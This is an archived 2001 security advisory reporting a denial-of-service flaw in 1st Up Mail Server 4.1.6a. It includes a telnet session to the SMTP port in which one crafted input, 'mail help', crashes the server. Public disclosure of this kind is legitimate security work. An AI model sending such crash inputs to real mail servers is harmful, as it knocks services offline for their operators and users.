TUCoPS :: Windows Net Apps :: sax20.txt

1st Up Mail Server multiple command denial of service

Securax-SA-20                                               Security Advisory                                             Dutch
Topic:          1st Up Mail Server multiple command denial of service.
Announced:      2001-05-15
Affects:        1st Up Mail Server version 4.1.6a (and probably below) 

 I.  Problem Description

 1st Up Mail Server  is a mail  server  program for  the MS-Windows operating
 system (9X, NT, 2000 & ME).  The program however  will crash  when one sends
 more than one SMTP command.
 II. Impact
 Anyway, by sending more than one SMTP command to the server it will crash, I
 will give a simple (yet powerful :P) example:
 /* (jupiler) is a Win98 box runnning 1st Up Mail Server 4.1.6a */
 [incubus:~]$ telnet jupiler 25
 Connected to
 Escape character is '^]'.
 220 MailServer V4.1 SMTP service ready          
 250 Imposter
 mail help                <------------ this is the magic thing.
 Connection closed by foreign host.
 However the program  crashes and yells for dr. Watson,  no register has been
 overwritten, so I  guess  this  will  be  a denial of service, nothing more, 
 nothing less.

 III. Solutions
 Vendor has been notified. Check for updates / bugfix at:
 IV credits
   incubus (
